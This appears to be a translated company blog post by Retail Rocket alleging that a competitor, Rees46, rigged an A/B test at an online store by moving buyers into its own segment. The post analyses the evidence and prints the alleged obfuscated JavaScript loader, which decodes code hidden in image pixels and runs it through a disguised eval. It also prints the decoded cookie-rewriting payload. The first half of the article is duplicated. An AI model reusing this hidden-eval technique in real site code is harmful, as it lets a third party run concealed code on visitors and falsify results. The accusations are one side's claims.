AB test attack: recipe 'R' + t (101) + 'es46'
AB testing is one of the most powerful and useful product management tools that allows you to evaluate the effectiveness of certain decisions on economic indicators in the Internet business. Over the five years of work, we conducted a huge number of AB tests, and therefore we know very well how difficult it is to conduct experiments correctly and what errors are constantly being repeated.
A few months ago, one of our competitors began to do something strange - to offer our customers a comparison of their recommendation system with Retail Rocket through AB tests in the “bet” format with an obligation to pay 100,000 rubles in case of loss.
Such stories are not uncommon for us - during the existence of the company, our system was compared with almost all existing recommender systems in Russia and abroad, and we always showed excellent results (we did not lose in effectiveness in any test).
The first test with Rees was not long in coming, but in the course of its implementation we came across rather strange results that resulted in a serious study. What we discovered in the end surprised us so much that we want to share the details of this study and bring its results to the court of the IT community and the e-commerce industry in Russia.
For several months in the online store "Daughters & Sons" there was a test of three recommendation systems: Retail Rocket, Rees and the company's internal system.
The mechanics of conducting AB testing: the entire audience of the site is randomly divided into three equal parts, and each part of the audience sees its own version of the site. Only blocks of personal recommendations change - each segment is shown blocks controlled by one of the recommendation systems:
As part of the test, the conversion of each traffic segment is measured, compared with others and the results decide which system works more efficiently.
The audience is divided on the client using JavaScript code, all users receive the identifier of one of the three segments of the test, which is stored in the cookie and then transferred to Google Analytics for every significant action on the site.
Test results at the time of writing an article from Google Analytics - conversion by segment
Segment A - recommender system for Daughters Sons
Segment B - recommender system Rees
Segment C - recommender system Retail Rocket
Conversion changes regarding indicators of the internal recommender system "Daughters & Son"
Based on these data, segment C (Retail Rocket) loses, segment B (Rees) wins. Separately, pay attention to May 27, on this day Retail Rocket shows the best performance - we will return to this detail later.
During the test, the engineering team of Retail Rocket conducted many internal tests, identified several errors on the site, fixed many integration problems and conducted a set of internal tests of various algorithms and their variations. All these actions did not bring tangible changes.
At Retail Rocket, we have several ways of evaluating the effectiveness and quality of recommendations. The very first of them is the so-called “expert assessment” (a subjective visual assessment of “adequacy”).
Let's look at examples of recommendations generated by Retail Rocket and Rees systems:
For cat litter, our system recommends carrying for animals and different types of cat food, and the Rees system recommends baby food, tea and a rectal tube for children.
There are a lot of such examples for fairly visited products (for which statistics quickly accumulate) (here is one of the reports visual assessment of quality), and although the expert assessment does not directly affect the numbers, this is a simple and quick way, which serves as a certain indicator of the quality of work of recommendation systems.
It seemed strange to us that with such a visual component, the numbers show the result not in our favor, so we spent a lot of resources on various internal studies of the causes.
First of all, we decided to explore an audience that interacts with blocks of product recommendations. When goods are clicked in the Rees recommendation blocks, a parameter is added to the URL:
We added a similar parameter to the goods URL from the Retail Rocket recommendation blocks:
And we built in GA segments that clicked on user recommendation blocks: The
first hypothesis was that our system guesses the user's preferences worse, recommends less relevant products.
If so, then our blocks should receive fewer clicks than the Rees recommendation blocks, which is refuted by Google Analytics - we get 2.81 times more clicks on widgets:
The second hypothesis that we considered: visually good recommendations distract people from buying and reduce conversion. Those. attract their attention, but distract from purchases and do not contribute to sales growth.
In this case, those who click into Retail Rocket recommendation blocks will convert worse than those who click into Rees blocks. But according to Google Analytics, this is not so, the conversion of those who clicked into Retail Rocket blocks is much higher (by 37% according to data for 4 days):
Thus, Retail Rocket much more often recommends products that are relevant to the user, users more often click on these products and recommendations positively affect sales.
If there are no problems with those who interact with the recommendations, and from the visual side the recommendations look relevant, it remains to look at those who do not click on the recommendations.
Starting to explore this segment of the audience, we noticed two interesting facts:
To check the correctness of the separation of the online store’s traffic into segments, we independently tested the segmentator using the code that used the site: in parallel with the main division, we started segmenting the same audience - the error was minimal:
This means that the segmentator is working correctly and there can be no errors of several percent, i.e. traffic distribution in the framework of the AB test "Daughters & Sons" contains an anomaly.
Our developers examined in detail the site code for JS errors and bugs that could affect segmentation, and did not find anything that could cause an anomaly.
The logical assumption was the idea that users can somehow move between segments. In our practice, there have been cases when users changed the segment inside the test, for example, due to an incorrectly set cookie lifetime (in one of the cookie stores, in which the identifier of the AB test segment was stored, only two weeks lived, and if the user returned after this time, it was randomly assigned a value - i.e. the user could fall into another segment of the test). To avoid such situations, we have developed a checklist in which there is an item on the need to make sure that the user does not change the segment during the test.
To track such situations, Google Analytics has the “Sequences” tool, which allows you to select users who were first in one segment and then moved to another. For analysis, we built several such segments in Google Analytics:
And as a result we got the following numbers:
According to these data, it is clearly visible that anomalously many users are moving to the Rees segment from the rest. And this is definitely not a bug, otherwise users would move between all segments evenly.
Second conclusion: these users make a lot of orders.
* The online store has confirmed that these are real orders (almost all of them have the status of “purchased”)
Based on the order numbers of users moved to the Rees segment, we examined our internal session logs and identified the following patterns:
Moving users to the Rees segment (top hours, left days)
Moving users to the Retail Rocket segment (top hours, days left)
The table shows that there are almost no movements on May 25 and 26, and on May 27, when the Retail Rocket system starts to go positive - movements begin again. And again, users move who add goods to the basket and will soon be converted into buyers.
Since moving loyal users to Rees seemed suspicious, we started looking for the reason for the change in the user segment and studying the code. We carefully examined who and how works with cookies, if someone could have accidentally done something to make such errors, and we did not find anything suspicious.
There were two options: either the cookie is changed by the server of the daughter’s store of the Son, and this is not visible on the client, or by the dynamic code that arrives from the server at some request.
While checking the dynamic code, we searched for the eval function, which is a special javascript function that can execute any text, for example, sent from the server, like JavaScript code, which in dishonest hands allows you to hide the functionality of the code, but at the same time gives full access to the whole environment site.
During the check, I came across a strange piece of code in the Rees JS library:
All code is available here . The peculiarity of this piece of code is that they obviously try to hide its functionality.
According to the code, several conclusions can be made:
We assume that as soon as this information is published, Rees will remove this code, so we saved it using two external independent services: https://web.archive.org and https://www.runscope.com
Its formatted version is available for research by reference .
To understand what this fragment does, we wrote a module that emulates user actions and logs all requests to the Rees server. On May 25 and 26, nothing happened (this can also be seen from the table with data on the hourly movement of users in the direction of Rees), and on May 27, when according to Google Analytics, the Retail Rocket system went positive in AB test, around 7 pm Moscow time started moving users to the Rees segment.
Moving users in Rees segment (above the clock, days left)
At the same time, we have recorded requests towards Rees server image in PNG format (the contents of the images can be viewed at the link ). It’s just that the picture is not available (error 404 is returned), but when the request for the Rees user’s picture is sent in the header, the picture is available for download:
If we transfer the picture to the code that we tried to encode / hide, we removed it separately for convenience , it turns out here is a JS that changes the value of the cookie where the user segment of the AB test is stored:
This code explicitly changes the two cookies belonging to the store in which the user segment is stored by the value of the segment equal to the Rees segment.
We are sure that Rees will hide all traces of this attack, therefore the picture is also saved by requesting an independent third-party service .
Thus, the code of the Rees system transfers to its segment users who have added goods to the basket and are about to complete the order.
According to the data obtained from the moment of logging of user movements (May 1–28), built on the basis of the segment originally issued to users (that is, those who first visited the site before May 1 were excluded from this data), Retail Rocket reliably wins the test. and Rees reduces store sales:
The exact window for the migration of loyal users of the online store to the Rees segment is not known, so the difference in efficiency is much larger.
In addition, we see signs of other attacks on the test in the Rees code, for example, when they first visit the site, their system carries out cookies matching with several RTB networks.
Synchronization code: You can see the saved request via the link on web.archive.org Synchronization requests: This at least allows online store competitors to access these users, and at the very least - retarget traffic to their segment and divert traffic from other segments of the test to a competitor, reducing conversion. An interesting fact is that this Rees attack was supported by an active PR campaign in the media and social networks:
For nearly 5 years of work, we first encounter such behavior. Unfortunately, we must admit that AB tests can only be carried out with the absolute confidence of the decency of all its participants.
We consider such methods of competition unfair and unacceptable, it harms the entire community and undermines the credibility of established work practices. At the moment, we are actively working in the legal field to punish the perpetrators and encourage the community to share experience in dealing with such situations.
A few months ago, one of our competitors began to do something strange - to offer our customers a comparison of their recommendation system with Retail Rocket through AB tests in the “bet” format with an obligation to pay 100,000 rubles in case of loss.
Such stories are not uncommon for us - during the existence of the company, our system was compared with almost all existing recommender systems in Russia and abroad, and we always showed excellent results (we did not lose in effectiveness in any test).
The first test with Rees was not long in coming, but in the course of its implementation we came across rather strange results that resulted in a serious study. What we discovered in the end surprised us so much that we want to share the details of this study and bring its results to the court of the IT community and the e-commerce industry in Russia.
AB testing of recommendation systems in the Daughters & Sons online store
For several months in the online store "Daughters & Sons" there was a test of three recommendation systems: Retail Rocket, Rees and the company's internal system.
The mechanics of conducting AB testing: the entire audience of the site is randomly divided into three equal parts, and each part of the audience sees its own version of the site. Only blocks of personal recommendations change - each segment is shown blocks controlled by one of the recommendation systems:
As part of the test, the conversion of each traffic segment is measured, compared with others and the results decide which system works more efficiently.
The audience is divided on the client using JavaScript code, all users receive the identifier of one of the three segments of the test, which is stored in the cookie and then transferred to Google Analytics for every significant action on the site.
Test results at the time of writing an article from Google Analytics - conversion by segment
Segment A - recommender system for Daughters Sons
Segment B - recommender system Rees
Segment C - recommender system Retail Rocket
Conversion changes regarding indicators of the internal recommender system "Daughters & Son"
Based on these data, segment C (Retail Rocket) loses, segment B (Rees) wins. Separately, pay attention to May 27, on this day Retail Rocket shows the best performance - we will return to this detail later.
During the test, the engineering team of Retail Rocket conducted many internal tests, identified several errors on the site, fixed many integration problems and conducted a set of internal tests of various algorithms and their variations. All these actions did not bring tangible changes.
Visual assessment of the quality of recommendations
At Retail Rocket, we have several ways of evaluating the effectiveness and quality of recommendations. The very first of them is the so-called “expert assessment” (a subjective visual assessment of “adequacy”).
Let's look at examples of recommendations generated by Retail Rocket and Rees systems:
For cat litter, our system recommends carrying for animals and different types of cat food, and the Rees system recommends baby food, tea and a rectal tube for children.
There are a lot of such examples for fairly visited products (for which statistics quickly accumulate) (here is one of the reports visual assessment of quality), and although the expert assessment does not directly affect the numbers, this is a simple and quick way, which serves as a certain indicator of the quality of work of recommendation systems.
Indirect quality assessment of recommendations
It seemed strange to us that with such a visual component, the numbers show the result not in our favor, so we spent a lot of resources on various internal studies of the causes.
First of all, we decided to explore an audience that interacts with blocks of product recommendations. When goods are clicked in the Rees recommendation blocks, a parameter is added to the URL:
We added a similar parameter to the goods URL from the Retail Rocket recommendation blocks:
And we built in GA segments that clicked on user recommendation blocks: The
first hypothesis was that our system guesses the user's preferences worse, recommends less relevant products.
If so, then our blocks should receive fewer clicks than the Rees recommendation blocks, which is refuted by Google Analytics - we get 2.81 times more clicks on widgets:
The second hypothesis that we considered: visually good recommendations distract people from buying and reduce conversion. Those. attract their attention, but distract from purchases and do not contribute to sales growth.
In this case, those who click into Retail Rocket recommendation blocks will convert worse than those who click into Rees blocks. But according to Google Analytics, this is not so, the conversion of those who clicked into Retail Rocket blocks is much higher (by 37% according to data for 4 days):
Thus, Retail Rocket much more often recommends products that are relevant to the user, users more often click on these products and recommendations positively affect sales.
If there are no problems with those who interact with the recommendations, and from the visual side the recommendations look relevant, it remains to look at those who do not click on the recommendations.
Online store audience research
Starting to explore this segment of the audience, we noticed two interesting facts:
- There are several percent more users in the Rees segment than in other segments, although the AB test settings imply an even distribution of the audience between the recommendation systems.
- In the Rees segment, the audience is more loyal, there are much more visitors who come to the site repeatedly.
To check the correctness of the separation of the online store’s traffic into segments, we independently tested the segmentator using the code that used the site: in parallel with the main division, we started segmenting the same audience - the error was minimal:
- Segment 1: 63,215 users
- Segment 2: 63,500 users
- Segment 3: 63686 users
This means that the segmentator is working correctly and there can be no errors of several percent, i.e. traffic distribution in the framework of the AB test "Daughters & Sons" contains an anomaly.
Our developers examined in detail the site code for JS errors and bugs that could affect segmentation, and did not find anything that could cause an anomaly.
The logical assumption was the idea that users can somehow move between segments. In our practice, there have been cases when users changed the segment inside the test, for example, due to an incorrectly set cookie lifetime (in one of the cookie stores, in which the identifier of the AB test segment was stored, only two weeks lived, and if the user returned after this time, it was randomly assigned a value - i.e. the user could fall into another segment of the test). To avoid such situations, we have developed a checklist in which there is an item on the need to make sure that the user does not change the segment during the test.
To track such situations, Google Analytics has the “Sequences” tool, which allows you to select users who were first in one segment and then moved to another. For analysis, we built several such segments in Google Analytics:
And as a result we got the following numbers:
According to these data, it is clearly visible that anomalously many users are moving to the Rees segment from the rest. And this is definitely not a bug, otherwise users would move between all segments evenly.
Second conclusion: these users make a lot of orders.
* The online store has confirmed that these are real orders (almost all of them have the status of “purchased”)
Based on the order numbers of users moved to the Rees segment, we examined our internal session logs and identified the following patterns:
- Almost all users moved to the Rees segment have products added to the basket (i.e. this is a more loyal / conversion audience);
- User movements are distributed unevenly across the clock, this indicates that it is manually initiated;
- Users move to the Rees segment on the days when Retail Rocket begins to win the AB test:
Moving users to the Rees segment (top hours, left days)
Moving users to the Retail Rocket segment (top hours, days left)
The table shows that there are almost no movements on May 25 and 26, and on May 27, when the Retail Rocket system starts to go positive - movements begin again. And again, users move who add goods to the basket and will soon be converted into buyers.
Researching the code running on the site
Since moving loyal users to Rees seemed suspicious, we started looking for the reason for the change in the user segment and studying the code. We carefully examined who and how works with cookies, if someone could have accidentally done something to make such errors, and we did not find anything suspicious.
There were two options: either the cookie is changed by the server of the daughter’s store of the Son, and this is not visible on the client, or by the dynamic code that arrives from the server at some request.
While checking the dynamic code, we searched for the eval function, which is a special javascript function that can execute any text, for example, sent from the server, like JavaScript code, which in dishonest hands allows you to hide the functionality of the code, but at the same time gives full access to the whole environment site.
During the check, I came across a strange piece of code in the Rees JS library:
A piece of code from the Rees JS library
key: "markDMP",
value: function(e) {
var t = function(e) {
return String.fromCharCode(e)
};
if (e)
for (var i in e)
if (e.hasOwnProperty(i))
if (function(e) {
return /\x61\x70\x69\x2E\x72\x65\x65\x73\x34\x36\x2E\x63\x6F\x6D/.test(e)
}(e[i])) {
var n = function() {
var n = document.createElement("canvas")
, o = void 0
, s = t(67)
, a = t(68)
, u = l.default.get(s.toLowerCase() + "ity") || l.default.get(t(71) + "EO_" + a + "ELIVERY_" + s + "ITY_I" + a)
, c = [s + "UR", s + "ITY", s + "ODE"];
if (n && n.getContext && u && !1 === g.default.isDebug()) {
if (/^a:/.test(u)) {
var h = r.unserialize(u);
if (!h || 464 === h[c.join("_")])
return "continue"
} else if (3784 === u || 3577 === u)
return "continue";
o = new Image,
o.crossOrigin = "use-credentials",
o.onload = function(e, r) {
r.width = this.naturalWidth,
r.height = this.naturalHeight;
var i = r.getContext("2d");
i.drawImage(this, 0, 0);
var n = i.getImageData(0, 0, this.naturalWidth, this.naturalHeight)
, o = n.data
, s = void 0
, a = void 0
, u = "";
for (s = 0,
a = o.length; s < a; s++)
if (!(s % 4 == 3 && s > 0)) {
if (0 === o[s])
break;
u += function(e) {
return String.fromCharCode(~-e)
}(o[s])
}
try {
window[t(101) + "val"](u)
} catch (e) {}
}
.bind(o, t, n),
o.src = e[i]
}
}();
if ("continue" === n)
continue
} else {
var o = document.createElement("img");
o.src = e[i],
o.style.width = 0,
o.style.height = 0,
o.style.display = "none",
o.style.position = "absolute",
o.style.left = "-9999px",
document.body.appendChild(o)
}
}
}
All code is available here . The peculiarity of this piece of code is that they obviously try to hide its functionality.
According to the code, several conclusions can be made:
- This code fragment was written specifically for the Daughters of the Son store, because it secretly uses a cookie called “city” belonging to the store (the store stores the user’s region identifier in it)
- The code is intentionally written to make it difficult to read and understand (instead of text, numeric identifiers of letters are used)
- The functionality of the code is specially hidden from external developers - the code does not work out when the browser console is open and for website visitors from Moscow (the online store should know what it integrates into its website and which line of code is responsible for what, but here is intentional concealment)
- The code is designed to download a picture from the Rees server, decode text from this picture, and transfer the text to the input of the naively hidden function eval (window [t (101) + "val"] (u))
- All this indicates the possibility of hidden execution of any code by Rees
We assume that as soon as this information is published, Rees will remove this code, so we saved it using two external independent services: https://web.archive.org and https://www.runscope.com
Its formatted version is available for research by reference .
To understand what this fragment does, we wrote a module that emulates user actions and logs all requests to the Rees server. On May 25 and 26, nothing happened (this can also be seen from the table with data on the hourly movement of users in the direction of Rees), and on May 27, when according to Google Analytics, the Retail Rocket system went positive in AB test, around 7 pm Moscow time started moving users to the Rees segment.
Moving users in Rees segment (above the clock, days left)
At the same time, we have recorded requests towards Rees server image in PNG format (the contents of the images can be viewed at the link ). It’s just that the picture is not available (error 404 is returned), but when the request for the Rees user’s picture is sent in the header, the picture is available for download:
If we transfer the picture to the code that we tried to encode / hide, we removed it separately for convenience , it turns out here is a JS that changes the value of the cookie where the user segment of the AB test is stored:
document.cookie="rr-VisitorSegment_Rec=3:2; domain=.dochkisinochki.ru; path=/; expires=Mon, 25 Sep 2017 10:15:20
+0000";document.cookie="DS_SM_rrSegmentRecommendedABC=B; domain=.dochkisinochki.ru; path=/
This code explicitly changes the two cookies belonging to the store in which the user segment is stored by the value of the segment equal to the Rees segment.
We are sure that Rees will hide all traces of this attack, therefore the picture is also saved by requesting an independent third-party service .
Thus, the code of the Rees system transfers to its segment users who have added goods to the basket and are about to complete the order.
According to the data obtained from the moment of logging of user movements (May 1–28), built on the basis of the segment originally issued to users (that is, those who first visited the site before May 1 were excluded from this data), Retail Rocket reliably wins the test. and Rees reduces store sales:
The exact window for the migration of loyal users of the online store to the Rees segment is not known, so the difference in efficiency is much larger.
In addition, we see signs of other attacks on the test in the Rees code, for example, when they first visit the site, their system carries out cookies matching with several RTB networks.
Synchronization code: You can see the saved request via the link on web.archive.org Synchronization requests: This at least allows online store competitors to access these users, and at the very least - retarget traffic to their segment and divert traffic from other segments of the test to a competitor, reducing conversion. An interesting fact is that this Rees attack was supported by an active PR campaign in the media and social networks:
Instead of a conclusion
For nearly 5 years of work, we first encounter such behavior. Unfortunately, we must admit that AB tests can only be carried out with the absolute confidence of the decency of all its participants.
We consider such methods of competition unfair and unacceptable, it harms the entire community and undermines the credibility of established work practices. At the moment, we are actively working in the legal field to punish the perpetrators and encourage the community to share experience in dealing with such situations.